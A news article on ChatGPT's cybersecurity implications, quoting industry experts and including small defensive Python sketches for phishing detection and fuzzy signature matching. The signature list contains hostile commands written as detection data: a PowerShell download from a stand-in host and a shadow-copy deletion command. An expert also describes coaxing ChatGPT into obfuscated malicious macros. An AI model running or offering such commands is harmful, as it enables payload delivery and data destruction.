ChatGPT raises cybersecurity and AI concerns

Since its release, ChatGPT, a chatbot capable of producing incredibly human-like text using a sophisticated machine learning model, has industry watchers heralding a new stage in the development of artificial intelligence (AI). ChatGPT’s ability to produce realistic conversations and messages — and to adapt to its mistakes — could have applications in industries ranging from finance to art.

In the three months since OpenAI announced ChatGPT, the chatbot has generated major headlines and buzz, with more than a million people testing the technology soon after its release. Microsoft has made significant investments in the platform, with a view to eventually integrating it into its cloud services.

With the excitement around ChatGPT comes a dark side, however, including concerns about security and the ability of cybercriminals to use the chatbot as they see fit. Researchers at Check Point have documented several instances of malicious actors deploying more sophisticated phishing emails written with the chatbot. Other threat actors are using the technology to create malware.

But whether these cybercriminal experiments will succeed remains to be seen. “It is still too early to decide whether or not ChatGPT functionality will become the new favorite tool for Dark Web participants. However, the cybercriminal community has already shown considerable interest and is jumping into this latest trend to generate malicious code,” Check Point researchers note in their latest report.

For cybersecurity experts, ChatGPT shows how AI is now moving into mainstream use. The growing adoption of these technologies also means that tech professionals need to start refreshing and strengthening their AI and cybersecurity skills, not only to develop more secure code as new applications are created, but also to counter whatever threat actors deploy using these same tools.

“Many organizations are unprepared for how this will change the threat landscape. You have to fight AI with AI, and organizations can seek cloud security that also uses generative AI and AI augmentation technology,” Patrick Harr, CEO of security firm SlashNext, recently told Dice. “Using these technologies to predict millions of new threat variants that could enter the organization is the only way to counter these attacks and close the security gaps and vulnerabilities created by this dangerous trend.”
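To make the “fight AI with AI” idea concrete, here is a minimal sketch, not any vendor’s product: a toy text classifier that scores incoming messages for phishing likelihood. The handful of training examples, the labels, and the 0.5 threshold are all invented for illustration; a real system would train on millions of labeled samples and weigh many more signals.

```python
# Toy sketch: scoring messages for phishing likelihood with a text classifier.
# The training data and threshold below are invented for illustration only.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# A handful of hand-labeled examples (1 = phishing, 0 = benign).
messages = [
    "Your account is locked. Verify your password here immediately.",
    "Invoice attached. Wire payment today to avoid service interruption.",
    "Lunch at noon tomorrow? Let me know if that still works.",
    "Here are the meeting notes from Tuesday's sprint review.",
]
labels = [1, 1, 0, 0]

# TF-IDF features feeding a logistic regression classifier.
model = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), LogisticRegression())
model.fit(messages, labels)

incoming = "Urgent: confirm your password to keep your account active."
score = model.predict_proba([incoming])[0][1]  # probability of the phishing class
if score > 0.5:  # arbitrary threshold for this sketch
    print(f"Flag for review (phishing score: {score:.2f})")
```

The design point mirrors Harr’s argument: the defender’s model improves as it sees more of the attacker’s generated variants, not by matching any single known message.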

AI brings unique security risks

Even before the release of ChatGPT, advancements in AI were already disrupting the cybersecurity industry. With information security spending estimated at $187 billion this year, Gartner expects CISOs and other security managers to spend more on AI technologies to protect against attacks that also use the technology.

At the same time, the research firm predicts that “all personnel hired for AI development and training work will need to demonstrate expertise in responsible AI.”

These developments mean tech professionals not only need to understand AI and its use within an organization, but also how developments such as ChatGPT can be quickly adapted by attackers, said Mike Parkin, senior technical engineer at Vulcan Cyber.

“If someone creates a new and useful tool, someone else will find a way to creatively abuse it. That’s what we’re seeing with ChatGPT now,” Parkin told Dice. “You can ask it to create code that will perform a specific function, like exporting files and then encrypting them. You can ask it to obfuscate this code and then give it to you as an embedded Excel macro. And it will.”

The most immediate threat, especially when it comes to AI technology like ChatGPT, is not that threat actors will use it to immediately create sophisticated malicious code, but rather that they will deploy the chatbot to improve phishing emails, making these malicious messages more realistic and more enticing for targets to open.
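One practical consequence: if polished prose no longer gives phishing away, defenses can lean on signals a language model cannot fake, such as where a link actually points. The sketch below is a hypothetical check, not any product’s logic, and the sample email and domains are invented; it flags HTML messages whose visible link text names one domain while the underlying href resolves to another, a classic phishing tell that survives even perfectly written copy.

```python
# Toy sketch: flag links whose visible text names one domain but whose
# href points to another. The sample email and domains are invented.
import re
from urllib.parse import urlparse

ANCHOR = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.IGNORECASE | re.DOTALL)
DOMAIN = re.compile(r'\b([a-z0-9-]+\.[a-z]{2,})\b', re.IGNORECASE)

def suspicious_links(html_body: str) -> list[tuple[str, str]]:
    """Return (visible_text, real_host) pairs where the domains disagree."""
    findings = []
    for href, text in ANCHOR.findall(html_body):
        real_host = urlparse(href).netloc.lower()
        for claimed in DOMAIN.findall(text):
            # Flag if the domain shown to the reader never appears in the real host.
            if claimed.lower() not in real_host:
                findings.append((text.strip(), real_host))
    return findings

email_html = '<p>Please sign in at <a href="http://login.example-phish.net/x">mybank.com</a></p>'
for shown, actual in suspicious_links(email_html):
    print(f"Mismatch: link shows '{shown}' but points to '{actual}'")
```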

“Compared to your typical scammer’s writing, ChatGPT is Shakespearean,” Parkin added. “That’s where I see a real threat in this technology. Truly innovative malicious code is a kind of art, and ChatGPT isn’t quite there yet. But for conversational situations, it already writes at a level above and beyond what many threat actors are doing now.”

In its review of ChatGPT, the Threat Intelligence team at security firm Tanium came to a similar conclusion: “The main takeaway from ChatGPT is not its destructive nature, but rather the development of interfaces by cybercriminals to help unskilled hackers create very sophisticated campaigns of various types: SMS scams, phishing lures, [business email compromise] attacks, etc.”

Develop skills to respond

The growing use of AI to create phishing emails demonstrates that tech professionals not only need to hone their security skills, but also need to ensure that their organization trains its employees to spot the telltale signs of these types of attacks.

Cybercriminals tend to be good at using technology to take advantage of skill gaps in their targets, making the organization much more vulnerable, noted Zane Bond, product manager at Keeper Security.

“The most realistic threat from these AI tools is the opportunity for bad actors with limited resources or technical knowledge to attempt more of these large-scale attacks,” Bond told Dice. “Not only can the tools help malicious actors create content such as a credible phishing email or malicious code for a ransomware attack, they can do it quickly and easily. Less defended organizations will be more vulnerable as the volume of attacks will likely continue to increase.”

Organizations that have technology professionals who understand AI and how to use it to automate the response to these attacks will have an advantage. This means opportunities for professionals who understand the intersection of AI and cybersecurity.

“Discovering vulnerabilities, especially detecting malware or insider threats, has always been a cat-and-mouse game with adversaries because detection tools typically rely on signatures,” John Steven, CTO at ThreatModeler, told Dice. “As signatures become effective, adversaries adapt. Generative AI will not change this equation, as it is a weapon that both parties can use in their current workflows. Adversaries will use these tools to create malware that evades detection. Defenders will use them to detect ‘conceptual’ signatures and their generated variants.”
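Steven’s notion of “conceptual” signatures can be illustrated with fuzzy matching: rather than demanding an exact match against a known-bad indicator, the detector scores similarity, so lightly mutated or machine-generated variants still register. The snippet below is a toy illustration built on Python’s standard library; the indicator strings are invented, and production systems use purpose-built similarity hashes such as ssdeep or TLSH rather than difflib.

```python
# Toy sketch of "conceptual" signature matching: score new samples against
# known-bad strings by similarity instead of exact match, so generated
# variants still register. Signatures and samples here are invented.
from difflib import SequenceMatcher

KNOWN_BAD = [
    "powershell -enc invoke-webrequest http://evil.example/payload",
    "cmd /c vssadmin delete shadows /all /quiet",
]

def best_match(sample: str, threshold: float = 0.8):
    """Return the closest known-bad signature if similarity clears the threshold."""
    sample = sample.lower()
    scored = [(sig, SequenceMatcher(None, sample, sig).ratio()) for sig in KNOWN_BAD]
    sig, score = max(scored, key=lambda pair: pair[1])
    return (sig, score) if score >= threshold else None

# A lightly mutated variant of the first signature still scores high.
variant = "PowerShell -Enc Invoke-WebRequest http://evil2.example/stage1"
hit = best_match(variant)
if hit:
    print(f"Variant matched signature '{hit[0]}' with similarity {hit[1]:.2f}")
```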
